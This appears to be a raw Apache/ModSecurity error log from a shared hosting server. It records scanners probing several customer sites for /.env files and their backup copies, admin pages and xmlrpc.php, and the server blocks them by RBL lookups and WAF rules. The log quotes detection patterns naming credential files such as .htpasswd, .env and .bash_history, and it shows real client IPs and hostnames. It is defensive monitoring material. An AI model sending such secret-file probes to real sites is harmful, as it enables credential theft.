[Tue May 26 13:03:50.513777 2026] [security2:error] [pid 470766:tid 470986] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM3ujO_W1DqEcFHQ761gAAAFo"]
[Tue May 26 13:03:50.531778 2026] [security2:error] [pid 470766:tid 470769] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/administrator/index.php"] [unique_id "ahVM3ujO_W1DqEcFHQ767wAADgI"]
[Tue May 26 13:03:51.130098 2026] [security2:error] [pid 470766:tid 470898] [client 4.201.75.230:46025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-signup.php"] [unique_id "ahVM3-jO_W1DqEcFHQ77HAAAAAI"]
[Tue May 26 13:03:51.420275 2026] [security2:error] [pid 470766:tid 470851] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/admin.php"] [unique_id "ahVM3-jO_W1DqEcFHQ77KQAAQ1Q"]
[Tue May 26 13:03:52.335019 2026] [cgid:error] [pid 470766:tid 471015] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/admin.cgi: script not found or unable to stat
[Tue May 26 13:03:53.316631 2026] [security2:error] [pid 470766:tid 470905] [client 14.180.135.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4OjO_W1DqEcFHQ77agAAAAk"]
[Tue May 26 13:03:53.628547 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4ejO_W1DqEcFHQ77fgAAAF8"]
[Tue May 26 13:03:53.703272 2026] [security2:error] [pid 470766:tid 470959] [client 4.201.75.230:5275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-start.php"] [unique_id "ahVM4ejO_W1DqEcFHQ77lwAAAD8"]
[Tue May 26 13:03:54.012948 2026] [security2:error] [pid 470766:tid 470926] [client 157.20.138.61:63233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM4ujO_W1DqEcFHQ77sgAAAB4"]
[Tue May 26 13:03:54.013057 2026] [security2:error] [pid 470766:tid 470926] [client 157.20.138.61:63233] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM4ujO_W1DqEcFHQ77sgAAAB4"]
[Tue May 26 13:03:54.727598 2026] [security2:error] [pid 470766:tid 471006] [client 4.201.75.230:5272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmlrpc_old.php"] [unique_id "ahVM4ujO_W1DqEcFHQ770QAAAG4"]
[Tue May 26 13:03:55.079774 2026] [autoindex:error] [pid 470766:tid 470923] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/control/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:55.553557 2026] [security2:error] [pid 470766:tid 470943] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4-jO_W1DqEcFHQ777QAAAC8"]
[Tue May 26 13:03:57.778031 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78XAAAAD8"]
[Tue May 26 13:03:57.778462 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78XQAAAG8"]
[Tue May 26 13:03:57.780570 2026] [security2:error] [pid 470766:tid 470835] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78eQAAAEQ"]
[Tue May 26 13:03:57.781192 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "vcresco.com"] [uri "/*update.cgi*"] [unique_id "ahVM5ejO_W1DqEcFHQ78fQAAAH0"]
[Tue May 26 13:03:57.782052 2026] [security2:error] [pid 470766:tid 470806] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78fwAAACc"]
[Tue May 26 13:03:57.782201 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78gQAAAH0"]
[Tue May 26 13:03:57.798156 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78VwAAAAk"]
[Tue May 26 13:03:57.801340 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78UgAAABA"]
[Tue May 26 13:03:57.804891 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78WQAAAGQ"]
[Tue May 26 13:03:57.814567 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78ewAAAHs"]
[Tue May 26 13:03:57.823359 2026] [security2:error] [pid 470766:tid 470952] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78iAAAADg"]
[Tue May 26 13:03:57.825569 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78igAAAC0"]
[Tue May 26 13:03:57.825708 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78iwAAAG0"]
[Tue May 26 13:03:58.203087 2026] [security2:error] [pid 470766:tid 470861] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM5ujO_W1DqEcFHQ78qQAAAV4"]
[Tue May 26 13:03:58.203207 2026] [security2:error] [pid 470766:tid 470859] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVM5ujO_W1DqEcFHQ78pgAAAVw"]
[Tue May 26 13:03:58.206313 2026] [security2:error] [pid 470766:tid 470769] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.bak"] [unique_id "ahVM5ujO_W1DqEcFHQ78rgAAAQI"]
[Tue May 26 13:03:58.206912 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.backup"] [unique_id "ahVM5ujO_W1DqEcFHQ78rQAAAUw"]
[Tue May 26 13:03:58.231982 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78pwAAAVE"]
[Tue May 26 13:03:58.235772 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78pQAAASI"]
[Tue May 26 13:03:58.240671 2026] [security2:error] [pid 470766:tid 470948] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78swAAADQ"]
[Tue May 26 13:03:58.242202 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78tAAAABY"]
[Tue May 26 13:03:58.243757 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78tQAAABE"]
[Tue May 26 13:03:58.254863 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78tgAAAHc"]
[Tue May 26 13:03:58.383774 2026] [security2:error] [pid 470766:tid 470774] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.old"] [unique_id "ahVM5ujO_W1DqEcFHQ781wAACgc"]
[Tue May 26 13:03:58.399061 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ780wAAABA"]
[Tue May 26 13:03:58.399608 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78zQAAAFE"]
[Tue May 26 13:03:58.399641 2026] [security2:error] [pid 470766:tid 471012] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ780AAAAHQ"]
[Tue May 26 13:03:58.400196 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78zgAAAAk"]
[Tue May 26 13:03:58.404412 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78ywAAAEA"]
[Tue May 26 13:03:58.408985 2026] [security2:error] [pid 470766:tid 470955] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ781QAAADs"]
[Tue May 26 13:03:58.410310 2026] [security2:error] [pid 470766:tid 471006] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ781AAAAG4"]
[Tue May 26 13:03:58.412293 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78zwAAAAw"]
[Tue May 26 13:03:58.417328 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ780gAAACs"]
[Tue May 26 13:03:58.448936 2026] [security2:error] [pid 470766:tid 471014] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ783QAAAHY"]
[Tue May 26 13:03:58.451644 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ783gAAAGM"]
[Tue May 26 13:03:58.477246 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78lgAAADU"]
[Tue May 26 13:03:58.481613 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ785AAAADc"]
[Tue May 26 13:03:58.488847 2026] [security2:error] [pid 470766:tid 470965] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ786gAAAEU"]
[Tue May 26 13:03:58.489737 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ786AAAAEk"]
[Tue May 26 13:03:58.500550 2026] [security2:error] [pid 470766:tid 470854] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.env.php"] [unique_id "ahVM5ujO_W1DqEcFHQ784QAAClc"]
[Tue May 26 13:03:58.549745 2026] [security2:error] [pid 470766:tid 470889] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.swp"] [unique_id "ahVM5ujO_W1DqEcFHQ789AAAJXo"]
[Tue May 26 13:03:58.555002 2026] [security2:error] [pid 470766:tid 470873] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env~"] [unique_id "ahVM5ujO_W1DqEcFHQ78-wAAJWo"]
[Tue May 26 13:03:58.587947 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_AAAAC8"]
[Tue May 26 13:03:58.598227 2026] [security2:error] [pid 470766:tid 470948] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_wAAADQ"]
[Tue May 26 13:03:58.600555 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_gAAADA"]
[Tue May 26 13:03:58.608368 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_QAAAC4"]
[Tue May 26 13:03:58.613310 2026] [security2:error] [pid 470766:tid 471011] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79BgAAAHM"]
[Tue May 26 13:03:58.614676 2026] [security2:error] [pid 470766:tid 470966] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79CQAAAEY"]
[Tue May 26 13:03:58.617530 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79CAAAAEg"]
[Tue May 26 13:03:58.629956 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79DgAAABs"]
[Tue May 26 13:03:58.643544 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79EwAAAD4"]
[Tue May 26 13:03:58.650101 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79FAAAAF8"]
